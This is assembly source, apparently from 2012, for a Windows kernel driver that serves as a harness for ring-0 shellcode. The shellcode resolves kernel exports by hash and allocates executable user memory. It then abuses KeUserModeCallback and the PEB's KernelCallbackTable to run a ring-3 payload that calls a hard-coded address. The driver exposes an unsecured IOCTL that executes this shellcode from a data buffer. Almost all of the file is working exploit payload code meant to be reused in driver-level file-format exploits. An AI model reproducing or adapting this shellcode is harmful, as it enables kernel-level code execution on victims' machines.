;Ring-0 shellcode: some file-format vulnerabilities are triggered inside a driver; this method lets existing ring-3 shellcode remain usable.
;Implementation: from ring 0, KeUserModeCallback is used to move the ring-3 shellcode into the user-mode environment and execute it there. What needs
;attention is that calls to KeUserModeCallback are subject to significant preconditions and must be analyzed per vulnerability!!!
.386
.model flat, stdcall
option casemap:none
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc
include \masm32\include\w2k\ntoskrnl.inc
include \masm32\include\w2k\w2kundoc.inc
include \masm32\macros\Strings.mac
includelib \masm32\lib\w2k\ntoskrnl.lib
.const
IOCTL_CALLBCK equ 224000h
CCOUNTED_UNICODE_STRING "\\Device\\pdf0daytest", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\pdf0daytest", g_usSymbolicLinkName, 4
.data
shellcodebuf db 1024 dup(0)
.code
;-----------------------------------------------------------------------
; MyShellcode - position-independent ring-0 payload (PoC harness)
; Layout-sensitive: the hash table and the scratch variables below are
; addressed relative to EDI, so nothing between @@beginaddr and argbuf
; may be reordered or resized. It is executed from a copy in shellcodebuf
; (see DispatchControl). Relies on hard-coded, build-specific offsets into
; 32-bit Windows structures (noted below) and on a user-mode caller
; context for KeUserModeCallback; none of the three kernel calls has its
; return status checked.
; In:  nothing (all state is derived locally)
; Out: nothing; all registers restored by popad
;-----------------------------------------------------------------------
MyShellcode proc
pushad
;int 3
;invoke DbgPrint, $CTA0("ntoskrnl addr:%08X\n"),eax
@@shellcodebegin:
call @@beginaddr ;pushes the address of @@beginaddr, used to locate the data below
@@beginaddr:
PUSH 03H ;number of API hashes to resolve (loop count for @@next2)
jmp @@realshellcode
;db 00h ;byte alignment; also leaves four zero bytes
;Pre-computed ROR-13 name hashes of the three exports to resolve. The
;lookup loop overwrites each slot in place with the resolved address
;(STOSD), so afterwards EDI points at BasicInfo and the addresses are
;read back as [EDI-0CH], [EDI-08H], [EDI-04H].
myZwQueryInformationProcess dd 0b16fe439h ;[EDI-0CH]
myZwAllocateVirtualMemory dd 0d33d4aedh ;[EDI-08H]
myKeUserModeCallback dd 0c126d6e0h ;[EDI-04H]
;scratch area, addressed as [EDI + sizeof(PROCESS_BASIC_INFORMATION) + n]
BasicInfo PROCESS_BASIC_INFORMATION <> ;[EDI+0]
ReturenLength dd 0 ;n=00h (sic: typo kept, the name is layout-bound)
r3scbuf dd 0 ;n=04h user-mode buffer returned by ZwAllocateVirtualMemory
r3scbuflen dd 1000H ;n=08h requested region size
ResultBuffer dd 0 ;n=0Ch
ResultLentgh dd 0 ;n=10h (sic)
argbuf dd 0 ;n=14h Arguments block handed to KeUserModeCallback
@@realshellcode:
POP ECX ;ECX = 3 (hash count)
POP EDI ;EDI = @@beginaddr
SCASD ;edi+4 : skip the PUSH/JMP pair so EDI points at the hash table
;SCASD ;edi+4
;get the ntoskrnl base address
;NOTE(review): fs-relative chain with hard-coded offsets (presumably
;KPCR -> KdVersionBlock -> PsLoadedModuleList -> first entry's DllBase);
;only valid for the 32-bit builds it was written against - confirm on target
assume fs:nothing
mov eax,[fs:1ch]
mov eax,[EAX+34h]
add eax,18h
mov eax,[eax]
mov eax,[eax]
mov ebp,[eax+18h] ;EBP = image base, added to every export-table RVA below
;walk the export table: for each hash slot at [EDI], scan AddressOfNames,
;hash every name with ROR 13 / ADD until one matches, then store the
;matching function address over the slot
@@next2:
PUSH ECX ;save the remaining-hash counter
MOV ESI,[EBP+3Ch] ;e_lfanew
MOV ESI,[EBP+ESI+78h] ;export directory RVA
ADD ESI,EBP
PUSH ESI ;keep the export directory pointer for the ordinal/address lookup
MOV ESI,[ESI+20h] ;AddressOfNames
ADD ESI,EBP
XOR ECX,ECX
DEC ECX ;name index starts at -1, pre-incremented below
@@next:
INC ECX
LODSD ;EAX = RVA of the next name
ADD EAX,EBP
XOR EBX,EBX ;EBX = running hash
@@again:
MOVSX EDX,BYTE PTR [EAX]
CMP DL,DH ;DH is 0 for ASCII bytes, so this is a NUL test
JZ @@end
ROR EBX,0Dh
ADD EBX,EDX
INC EAX
JMP @@again
@@end:
CMP EBX,[EDI] ;compare with the hash slot at EDI
JNZ @@next ;no NumberOfNames bound: an unmatched hash keeps reading past the table
POP ESI ;export directory
MOV EBX,[ESI+24h] ;AddressOfNameOrdinals
ADD EBX,EBP
MOV CX,WORD PTR [ECX*2+EBX] ;ordinal; upper half of ECX is the (small) index's zero bits
MOV EBX,[ESI+1Ch] ;AddressOfFunctions
ADD EBX,EBP
MOV EAX,[ECX*4+EBX]
ADD EAX,EBP ;EAX = resolved export address
STOSD ;write it over the hash slot, EDI advances to the next slot
POP ECX
loop @@next2
comment #
mov eax,[edi-08H]
invoke DbgPrint, $CTA0("zwallmemory addr:%08X\n"),eax
mov eax,[edi-04H]
invoke DbgPrint, $CTA0("keusermod addr:%08X\n"),eax
mov eax,[edi-0CH]
invoke DbgPrint, $CTA0("queryinfo addr:%08X\n"),eax
#
;PROCESS_BASIC_INFORMATION STRUCT ; sizeof = 18h
; ExitStatus NTSTATUS ?
; PebBaseAddress PVOID ? ; PPEB
; AffinityMask DWORD ?
; BasePriority DWORD ? ; KPRIORITY
; UniqueProcessId DWORD ?
; InheritedFromUniqueProcessId DWORD ?
;PROCESS_BASIC_INFORMATION ENDS
;PPROCESS_BASIC_INFORMATION typedef PTR PROCESS_BASIC_INFORMATION
;ZwQueryInformationProcess(NtCurrentProcess(), ProcessBasicInformation,
;                          &BasicInfo, sizeof(BasicInfo), &ReturenLength)
;the return status is ignored; BasicInfo is used as-is below
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)] ;&ReturenLength
push eax
push sizeof(PROCESS_BASIC_INFORMATION)
push edi ;&BasicInfo
push ProcessBasicInformation ;0
or eax,-1 ;NtCurrentProcess() = -1
push eax
call dword ptr [EDI-0CH] ;ZwQueryInformationProcess
;assume edi:ptr PROCESS_BASIC_INFORMATION
;mov eax,[edi].PebBaseAddress
;assume edi:nothing
;invoke DbgPrint, $CTA0("peb addr:%08X\n"),eax
;ZwAllocateVirtualMemory(NtCurrentProcess(),&pBuf,0,&buflen,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
;(flags actually pushed: MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN; the status
;is ignored - on failure r3scbuf stays 0 and the copy below writes through it)
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+8] ;&r3scbuflen (RegionSize)
push eax
push 0 ;ZeroBits
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4] ;&r3scbuf (BaseAddress, in/out)
push eax
or eax,-1
push eax
call dword ptr [EDI-08H] ;ZwAllocateVirtualMemory
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
mov eax,[eax] ;EAX = r3scbuf (user-mode RWX buffer)
;invoke DbgPrint, $CTA0("mem addr:%08X\n"),eax
;copy r3 shellcode: buffer layout is [pointer to stub][stub bytes...];
;the first dword points at offset +4 of the same buffer
mov ebx,eax
add eax,4
mov [ebx],eax
add ebx,4
call @@beginr3scaddr
@@beginr3scaddr:
jmp @@realshellcode2
;29-byte self-locating user-mode stub: appears to call a hard-coded
;absolute user-mode address (build-specific, not resolved at runtime) with
;the embedded string as argument and return with RET 8. It is copied as
;8 dwords (32 bytes), so 3 bytes of the following code go along with it.
sc db 0E8H,00H,00H,00H,00H,59H,0ebH,05H,'c',':','\','p',00H,83H,0c1H,03H,6Ah,00H,51H,0B8H,19H,062H,082H,7cH,0FFH,0D0H,0C2H,08H,00H
@@realshellcode2:
pop esi ;ESI = @@beginr3scaddr
add esi,2 ;skip the 2-byte JMP so ESI points at sc
mov ecx,8 ;dword count
@@nextcopyr3sc:
mov eax,[esi]
mov [ebx],eax
add esi,4
add ebx,4
loop @@nextcopyr3sc
;KeUserModeCallback(ApiIndex,Arguments,sizeof(ULONG)*(ARGUMENTSCOUNT+1),&ResultBuffer,&ResultLentgh);
;ApiIndex is computed so that PEB->KernelCallbackTable[ApiIndex] is the
;first dword of r3scbuf. That presumes the buffer lies above the table
;(MEM_TOP_DOWN); there is no ordering or bounds check, and SHR (not SAR)
;turns a negative difference into a huge index. The header's caveat
;applies: the required KeUserModeCallback context is not verified here.
assume edi:ptr PROCESS_BASIC_INFORMATION
mov eax,[edi].PebBaseAddress
assume edi:nothing
.if eax!=0
mov ebx,[eax+2ch] ;KernelCallBackTable
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
mov eax,[eax]
sub eax,ebx
shr eax,2 ;eax/4
mov ebx,eax ;apiindex
.else
jmp @@exitr0 ;no user-mode PEB for this process: skip the callback entirely
.endif
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+10h] ;&ResultLentgh
push eax
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+0ch] ;&ResultBuffer
push eax
push 4 ;ArgumentLength: only 4 is passed, not sizeof(ULONG)*(count+1) as the comment says
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+14h] ;&argbuf (Arguments)
push eax
push ebx ;ApiIndex
call dword ptr [EDI-04H] ;KeUserModeCallback, status ignored
@@exitr0:
popad
ret
MyShellcode endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;-----------------------------------------------------------------------
; IRP_MJ_DEVICE_CONTROL handler. For IOCTL_CALLBCK it copies MyShellcode
; into the writable shellcodebuf and calls it there, so the payload runs
; from a data buffer as it would in a real exploit rather than from .code.
; No input buffer is consumed, so the caller's buffer/lengths are never
; touched. Any caller that can open the device can issue the IOCTL: the
; device is created with IoCreateDevice and no explicit security
; descriptor (see DriverEntry).
; Returns: STATUS_SUCCESS or STATUS_INVALID_DEVICE_REQUEST, also stored in
; the IRP; IoStatus.Information is always 0.
;-----------------------------------------------------------------------
DispatchControl proc uses esi edi ebx pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
local status:NTSTATUS
local dwBytesReturned:DWORD
and dwBytesReturned, 0
mov esi, pIrp
assume esi:ptr _IRP
IoGetCurrentIrpStackLocation esi ;macro: EAX = current stack location
mov edi, eax
assume edi:ptr IO_STACK_LOCATION
.if [edi].Parameters.DeviceIoControl.IoControlCode == IOCTL_CALLBCK
invoke DbgPrint, $CTA0("IOCTL_CALLBCK\n")
;fixed 1000-byte copy: appears to exceed the MyShellcode procedure itself,
;so the tail of the copy is whatever follows it in .code. shellcodebuf is
;1024 bytes, so the destination does not overflow.
invoke RtlMoveMemory,addr shellcodebuf,MyShellcode,1000d
lea eax,shellcodebuf ;emulate the real exploit environment: execute from a data buffer
call eax ;MyShellcode saves/restores all registers (pushad/popad)
mov status, STATUS_SUCCESS
.else
mov status, STATUS_INVALID_DEVICE_REQUEST
.endif
assume edi:nothing
push status
pop [esi].IoStatus.Status
push dwBytesReturned
pop [esi].IoStatus.Information
assume esi:nothing
fastcall IofCompleteRequest, pIrp, IO_NO_INCREMENT
mov eax, status
ret
DispatchControl endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;-----------------------------------------------------------------------
; IRP_MJ_CREATE / IRP_MJ_CLOSE handler: completes the IRP with
; STATUS_SUCCESS and zero Information, no per-handle state is kept.
; In:  pDeviceObject (unused), pIrp
; Out: EAX = STATUS_SUCCESS
;-----------------------------------------------------------------------
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
xor eax, eax ;STATUS_SUCCESS is 0, reused for Information as well
mov ecx, pIrp
assume ecx:ptr _IRP
mov [ecx].IoStatus.Status, eax
mov [ecx].IoStatus.Information, eax
assume ecx:nothing
fastcall IofCompleteRequest, pIrp, IO_NO_INCREMENT
mov eax, STATUS_SUCCESS
ret
DispatchCreateClose endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;-----------------------------------------------------------------------
; DriverUnload: removes the \??\ symbolic link, then the device object
; that DriverEntry created (reverse creation order).
; In:  pDriverObject
; Out: nothing (EAX undefined, as before)
;-----------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov ecx, pDriverObject
assume ecx:ptr DRIVER_OBJECT
mov ecx, [ecx].DeviceObject ;first device object on the driver's list
assume ecx:nothing
invoke IoDeleteDevice, ecx
ret
DriverUnload endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverBegin
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT
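;-----------------------------------------------------------------------
; DriverEntry: creates the device, its \??\ symbolic link and installs
; the dispatch routines.
; Fix: the original always returned STATUS_SUCCESS, so a failed
; IoCreateDevice/IoCreateSymbolicLink left the driver loaded with no
; usable device and no DriverUnload. The real NTSTATUS is now propagated
; and the device is deleted when the symbolic link cannot be created.
; Note: IoCreateDevice is used without a security descriptor, so any
; caller that can open the device reaches DispatchControl.
; In:  pDriverObject, pusRegistryPath (unused)
; Out: EAX = NTSTATUS
;-----------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PVOID
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, \
0, FALSE, addr pDeviceObject
mov status, eax ;propagate the real failure code instead of a constant
.if eax == STATUS_SUCCESS
invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
mov status, eax
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:PTR DRIVER_OBJECT
mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)],offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)],offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
.else
;symbolic link failed: DriverUnload will not run, so undo the device here
invoke IoDeleteDevice, pDeviceObject
.endif
.endif
mov eax, status
ret
DriverEntry endp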
end DriverEntry
2012年1月6日 20:29